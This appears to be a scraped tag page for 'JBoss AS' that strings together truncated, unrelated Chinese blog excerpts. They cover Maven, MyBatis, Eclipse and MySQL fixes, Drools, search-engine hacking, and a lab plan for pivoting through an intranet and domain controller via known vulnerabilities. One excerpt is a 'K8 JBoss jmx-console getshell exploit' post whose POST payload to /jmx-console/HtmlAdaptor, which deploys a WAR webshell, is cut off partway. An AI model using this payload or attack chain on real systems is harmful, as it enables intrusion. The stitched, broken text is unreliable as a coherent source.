JBoss AS

本文仅为了学习交流，自己搭建靶机环境进行测试，严禁非法使用！！！ (随笔仅为平时的学习记录，若有错误请大佬指出) 一: 内网靶机分布 内网入口(攻击者和该win10在同一网段，攻击者无法访问win10虚拟机中的主机) win10 phpstudy thinkphpv5.0.24 域环境（均可以出网） win7 phpstudy uploads-lab win2003 jboss4.x漏洞 win2008 域控 双网卡(其中一个网卡链接着下面的主机) 其他主机(以下主机在同一网段，不能出网，与域环境处于不同网段，只有域控可以访问以下主机) win7 Tomcat win2008 Mssql win2003 win2012 weblogic 攻击思路: 拿下存下ThinkPhp漏洞的主机-开启socks代理进入内网-通过uploads-lab上传webshell拿下win7-通过weblogic漏洞拿下win2012dc-通过jboss4.x漏洞拿下win2003-通过MS14-068漏洞拿下域控-添加第二个网卡的路由-通过Tomcat漏洞拿下win7-解密win7的数据库密码拿下win2008权限-获取win2008的远程连接凭证拿下win2003-拿下全部主机 二:(Cobalt Strike3.14简称CS，Msfconsole简称MSF) 访问win10的web服务

解决办法： https://tunatore.wordpress.com/2015/06/15/org-jboss-tools-vpe-xulrunner-xulrunnerbundlenotfoundexception-bundle-org-mozilla-xulrunner-win32-win32-x86_64-is-not-found/ 二、Eclipse中jsp异常 The superclass "javax.servlet.http.HttpServlet" was not found on the Java Bu 问题描述： 学习ssh商城的时候，将资料中给的静态文件引入jsp文件夹，但是每个文件都有一个大红×，，然后在jsp文件里面出现了The superclass"javax.servlet.http.HttpServlet" was not found on the Java Build Path错误异常 原因分析： 在Javaweb工程下没有引入中间件（服务器Tomcat）运行的library 解决办法： （1）确认eclipse中server的运行环境是否有配置，设置方法为：Window-->Preferences-->Server-->RuntimeEnvironments-->Add-->选择Apache的版本后点Next，再填入安装的Apache

项目已托管到 GitHub ，大家可以去GitHub查看下载！并搜索关注微信公众号 码出Offer 领取各种学习资料！ MyBatis 一、ORM概述 对象关系映射（Object Relational Mapping，简称ORM）是通过使用描述对象和数据库之间映射的元数据，将面向对象语言程序中的对象自动持久化到关系数据库中。本质上就是将数据从一种形式转换到另外一种形式。 ORM 二、ORM映射 2.1 MyBatis自动ORM失效 MyBatis只能自动维护库表“列名”与“属性名”相同时的一一对应关系，二者不同时，无法自动ORM。 自动ORM失效 007 2.2 解决方式一：列的别名 在SQL中使用 as 为查询字段添加列别名，以匹配属性名。 <mapper namespace= "com.mylifes1110.dao.ManagerDao" > <select id= "selectManagerByIdAndPwd" resultType= "com.mylifes1110.bean.Manager" > SELECT mgr_id AS id , mgr_name AS username , mgr_pwd AS password FROM t_managers WHERE mgr_id = #{id} AND mgr_pwd = #{pwd} </select> <

一、何为Maven 　　 1、Maven是优秀的构建工具 　　 maven的用途之一是用于构建，他是一个强大的构建工具，能够帮助我们自动化构建过程，从清理、编译、测试到生成报告，再到打包和部署。 他抽象了一个完整的构建生命周期模型，帮助我们标准化构建过程。 Maven作为一个构建工具，不仅能帮我们自动化构建，还能够抽象构建过程，提供构建任务实现；他跨平台，对外提供一致的操作接口， 这一切足以使它成为优秀的、流行的构建工具。 2、依赖管理工具和项目信息管理工具 　　 Maven不仅是构建工具，还是一个依赖管理工具和项目信息管理工具。他提供了中央仓库，能帮我们自动下载构建。 他提供了一个优秀的解决方案，通过一个坐标系统准确地定位每一个构建（artifact）,也就是通过一组坐标maven能够找到任何一类java类库。 我们可以借助它来有序地管理依赖，轻松解决那些复杂的依赖问题。 二、安装配置 1、具体安装步骤（略） 　 2、maven用户可以选择配置M2_HOME/conf/settings.xml或者~/.m2/settings.xml. 　　 M2_HOME/conf/settings.xml 是全局范围的，整台机器上所有用户都会直接受到该配置的影响， 　　 ~/.m2/settings.xml. 是用户范围的，只有当前用户才会受到该配置的影响。 三、依赖管理 　 　1、坐标和依赖

1：本地资源库、中央存储库、远程存储库　 　　 1.1 本地资源库 　　当你建立一个 Maven 的项目，Maven 会检查你的 pom.xml 文件，以确定哪些依赖需要下载。首先，Maven 将从本地资源库获得 Maven 的本地资源库依赖资源，如果没有找到，然后把它会从默认的 Maven 中央存储库 – http://repo1.maven.org/maven2 查找，然后下载到本地仓库。 　　Maven的本地资源库是用来存储所有项目的依赖关系(插件jar和其他文件），这些文件被Maven下载到本地文件夹。当你建立一个Maven项目，所有相关文件将被存储在你的Maven本地仓库。默认情况下，Maven的本地资源库默认为 .m2 目录文件夹：Windows – C:\Documents and Settings\用户名\.m2 　　修改从Maven中心仓库下载到本地的jar包的默认存储位置：打开settings.xm（包含仓库地址、镜像、插件、代理等配置）l文件，在conf文件夹下面。 加入 < localRepository >D:\maven\mvnRespo </ localRepository > 这句代码；其中中间填写自己想要保存的本地库位置路径。例如： < localRepository >E:/repository </ localRepository > <

喜欢关注公众号： java乐园 日常生活是由规则驱动的。红灯停绿灯行，这是我们的交通规则；我们站着往上跳，最终还是要落下来，这是地球的引力规则。规则在生活中无处不在。软件开发中我们也需要规则，满足什么规则应该进入什么分支。如果做过风控系统，就知道风控系统里存在非常多的规则（比如：age < 16 || age > 50 -> REJECT ）。最便捷的实现就是用 if-else 来写，但是随着规则的增加以及需求的变动，代码将变得越来越难阅读和理解，如果再去修改这些代码，然后测试不够充分的话，将产生严重的生产事故。这时候就要引入Drools等规则引擎了。Drools就是为了解决业务代码和业务规则分离的引擎。 要使用Drools规则引擎，需要先安装安装JBoss Drools Support插件，这里就不多说怎么安装安装JBoss Drools Support插件。下载地址如下： https://download.jboss.org/drools/release/7.3.0.Final/droolsjbpm-tools-distribution-7.3.0.Final.zip 1、 新建项目sc-activiti-drools，对应的pom.xml文件如下 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http:/

[原创]K8 Jboss jmx-console getshell exploit https://www.cnblogs.com/k8gege/p/10645858.html 0x00 前言 今天内网遇到几台Jboss，使用MSF确实是有点烦，要打几条命令设置一堆参数,我一个粘贴搞定的 为什么非要使用手动打好几条命令,让外行人看起来牛逼吗？大家都知道黑客电影打字快并不是高手 那些水平不是很高的才一整天在外行人面前说,我用Linux系统我用MSF等等,用Linux并不会高人一等 Windows下也有一堆命令,懂CMD去用Linux也一样很简单,再说Linux一样有界面的，没什么好装的。 难道我会告诉你们我最虚拟机里用XP系统吗？？OK,废话不多说，上道具,不对拿枪上好子弹开炮！ 0x001 手动版 (提供子弹payload) K8飞刀---漏洞调式/HackIE---POST提交（你也可以把子弹装到其它枪上） 目标: url + /jmx-console/HtmlAdaptor 提交数据 action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jbossjdk.war&argType=java.lang

问题： In my office, the mere mention of the word Xerces is enough to incite murderous rage from developers. 在我的办公室里，仅仅提到Xerces这个词就足以煽动开发者的凶悍愤怒。 A cursory glance at the other Xerces questions on SO seem to indicate that almost all Maven users are "touched" by this problem at some point. 粗略地看一眼其他Xerces关于SO的问题似乎表明，几乎所有Maven用户都会在某个时候“触及”这个问题。 Unfortunately, understanding the problem requires a bit of knowledge about the history of Xerces... 不幸的是，理解这个问题需要对Xerces的历史有一点了解...... History 历史 Xerces is the most widely used XML parser in the Java ecosystem. Xerces是Java生态系统中使用最广泛的XML解析器。 Almost every library

一、问题 因停电检修，今天重启服务器后，再启动jboss就报错“MySQLNonTransientConnectionException: Public Key Retrieval is not allowed”，jboss无法获取对数据源的JDBC连接。 二、解决过程 百度一下，先说是旧版JDBC驱动的bug，于是从maven中央库下载最新的mysql-connector-8.0.11.jar，替换后修改jboss的modle说明、将配置文件中的driver-class改为'com.mysql.cj.jdbc.Driver'，但错误依旧。随后发现8.0.11版与hibernate不匹配，又改回原来的5.1.46。 继续百度，说是需修改default_authentication_plugin设置，于是修改my.ini，增加[mysqld] default_authentication_plugin=mysql_native_password，重启mysql 8，错误依旧。 继续百度，说是仍需修改用户的密码加密方式，于是在mysql命令行执行：ALTER USER 'myuser'@'localhost' IDENTIFIED WITH mysql_native_password BY 'mypassword';，这次虽仍报错，但错误提示变成

猫宁！！！ 参考链接： https://www.freebuf.com/articles/network/169601.html https://www.jianshu.com/p/f8062e2cc1d7 百度搜索高级语法很多，但在渗透测试中有效的语法也就10多个，它们通过自由组合，帮我们实现高效搜索目标。 相比语法，语法的应用场景更为关键，exp-db中的google hacking提供了大量的参考场景，给我们提供了多种多样的弹药。 https://www.exploit-db.com/google-hacking-database 能用百度演示，就不用了谷歌了，原因结尾说，不过别误解，和GFW没半毛钱关系。 双引号 "" ，英文双引号，锁定关键词 我试了一下百度，"百度网盘"加引号与不加引号搜索结果区别不大，借助谷歌。 不加引号，你看网页说明出，还有 百度 这个结果标红，搜索结果1.36亿条。 加引号，截图之外的网页说明处也都是标红 百度网盘 这个关键词，更精准，搜索结果3800万条。 加号，让搜索中尽可能出现加号之后的关键词，这个功能在谷歌和百度中都比较鸡肋。星号，英文的小点以及“~”用处同样不明显。搜索引擎高级语法本身也是区分可用性程度的。 百度 +网盘，百度 网盘，没有什么大的差别，虽然搜索结果上 百度 网盘 的结果是前者的2倍，但对用户没产生明显影响。 减号